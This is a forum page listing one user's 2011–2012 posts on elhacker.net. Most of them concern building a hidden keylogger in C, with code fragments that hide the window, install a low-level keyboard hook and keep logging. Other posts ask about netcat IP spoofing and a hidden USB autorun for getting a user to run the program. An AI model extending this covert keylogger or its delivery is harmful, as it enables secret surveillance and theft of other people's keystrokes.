elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22
201  Foros Generales / Dudas Generales / Duda sobre netcat en: 5 Enero 2012, 14:41 pm
¡Buenas a todos!

Me gustaria saber como netcat con el parametro -s es capaz de falsear la ip de origen.

Porque me he puesto a pensarlo.....y si yo establezco una conexion TCP/IP con un PC, y pongo como IP de origen una cualquiera, cuando el PC al que me he conectado me envie datos, los enviara a la IP que yo he puesto como IP de origen y por tanto, no deberian llegar a mi PC.

¿Como falsea la IP netcat?

¡Muchas gracias!
202  Programación / Programación C/C++ / Conexión con direccion mac en: 5 Enero 2012, 13:40 pm
¡Buenas a todos!
Tengo un par de preguntas de las cuales no encuentro una respuesta.

1) He leido que la direccion MAC se puede cambiar....¿es cierto?, porque a mi entender la MAC es una direccion de red que es unica para cada tarjeta de red, como si fuera un ID...

2) Sabiendo la direccion MAC de un PC y desconociendo su IP, ¿como podria conectarme a dicho PC? ¿Que funciones en C/C++ permiten hacer una resolucion IP a partir de la MAC?

¡Muchas Gracias!
203  Programación / Programación C/C++ / Re: wait() en c++ (windows) en: 22 Diciembre 2011, 02:22 am
¡Muchas gracias a todos!

Probe el Sleep y el waitForSingleObject y no me terminaba de ir con estos metodos.....el caso es que la espera la hacia, pero dejaba de loggear... :S

Pero al final con el codigo de BlackZeroX (Astaroth) me ha funcionado perfectamente. Lo unico que del codigo hay que cambiar 2 null por false.
Código:
    void ProcessMessages(){
         MSG msg;
         while (GetMessage(&msg, NULL, FALSE, FALSE) != -1)
               DispatchMessage(&msg);
    }

y con esto solo tuve que sustituir el MessagBox por ProcessMessages y funciona 100%

¡Muchas Gracias!
¡Un saludo!
204  Programación / Programación C/C++ / Re: wait() en c++ (windows) en: 21 Diciembre 2011, 22:31 pm
No, no estoy usando Sleep() y no quiero usarlo porque quiero que haga una espera indefinida de tiempo, si hago por ejemplo un Sleep(1000) espera un segundo....y si meto el Sleep() dentro de un while infinito (para simular un wait() ) me como los recursos de la CPU, por eso prefiero un wait() o similar (ya que no chupa recursos y no tiene espera activa) :)

No se....¿alguna idea mas? :)
¡Gracias!
205  Programación / Programación C/C++ / Re: wait() en c++ (windows) en: 21 Diciembre 2011, 21:39 pm
Ok, en realidad lo que estoy haciendo es un keylogger...y este es el codigo:
Código:
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {  
        // Main();
        ocultar();
        file();
        hora();
        HHOOK keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,keyboardHookProc,hInstance,0);
        MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);
        fclose(fichero);
        return 0;
    }

Bien, funciona todo correctamente, pero me saca por pantalla el MessageBox(). Y lo que quiero es quitarlo. Si lo quito sin mas, el Main finaliza, ya que el MessageBox permite que se quede en espera el keylogger hasta que se presione el boton de OK.
Y por eso quiero el wait() para hacer la espera....y es que con sleep() se da el problema de la espera activa y chupa muchos recursos de la CPU

¿Alguna idea de como quitar ese MessageBox y de que no finalice la ejecucion?

¡Gracias!
206  Programación / Programación C/C++ / wait() en c++ (windows) en: 21 Diciembre 2011, 20:46 pm
¡Buenas a todos!

Quiero esar la funcion wait() en c++ para windows y el compilador dice que esta funcion no la tengo definida.
Asi que el error esta en que no tengo incluida la libreria adecuada. En linux es sys/wait.h y ¿en windows cual es?
Segun he leido por google, la libreria es unistd.h pero esta ya la tengo incluida y me sigue dando el mismo error.

Estas son mis librerias:
    #include<stdio.h>
    #include<fstream>
    #include<windows.h>
    #include<time.h>
    #include<conio.h>
    #include<unistd.h>
¿cual es la libreria que me falta?

Y otra pregunta:
Me he encontrado esto en un codigo antes de los includes:
     #define _WIN32_WINNT 0x0500
Tiene pinta de decir en que posicion de la memoria se debe cargar el programa...¿es eso? si no es asi, ¿que significa?

¡Gracias, un saludo!

207  Programación / Programación C/C++ / Re: Keylogger: Cambio de ventana en: 6 Diciembre 2011, 16:12 pm
¡Muchas gracias! ya me ha quedado claro y creo que podré hacerlo sin problema!
¡Un saludo!
208  Programación / Programación C/C++ / Re: Keylogger: Cambio de ventana en: 6 Diciembre 2011, 02:35 am
Efectivamente, cuando el keylogger pasa a background deja de capturar....
Para coger las letras uso getch() porque me parece sencillo y al fin y al cabo solo me importan los caracteres ascii (las teclas F1..F12 y demas puedo prescindir de ellas..)

En cuanto al hook, no conozco esta funcion...he buscado un poco por google y he visto que es un metodo API, pero no termino de ver lo que es y como funciona, ¿podrías aclaramelo?

¡Gracias!
209  Programación / Programación C/C++ / Keylogger: Cambio de ventana en: 5 Diciembre 2011, 23:04 pm
¡Buenas a todos!

Estoy haciendo mi primer keylogger en C. Me funciona todo perfectamente excepto que si el usuario hace un cambio de ventana, el programa ya no captura las teclas...
¿Hay alguna función que me permita solucionar esto?

!Gracias, un saludo¡

210  Sistemas Operativos / Windows / Re: Autoejecutar USB oculto! en: 21 Noviembre 2011, 18:00 pm
Gracias dato000, creo que tienes razon, es cosa del SO. Imagino que tendre que meterlo en el autorun.ini y esperar que el usuario lo ejecute....
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines